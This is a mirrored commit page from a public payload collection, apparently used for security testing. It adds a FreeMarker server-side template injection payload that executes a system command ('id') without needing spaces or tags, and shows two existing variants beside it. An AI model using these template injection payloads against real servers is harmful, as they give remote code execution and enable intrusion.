mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-11 22:15:26 +00:00
Added freemarker PoC that doesn't require spaces or tags
This commit is contained in:
parent
9be62677b6
commit
601db0e188
@ -150,6 +150,7 @@ The template can be `${3*3}` or the legacy `#{3*3}`
|
|||||||
```js
|
```js
|
||||||
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||||
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
|
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
|
||||||
|
${"freemarker.template.utility.Execute"?new()("id")}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Jade / Codepen
|
## Jade / Codepen
|
||||||
|
Loading…
Reference in New Issue
Block a user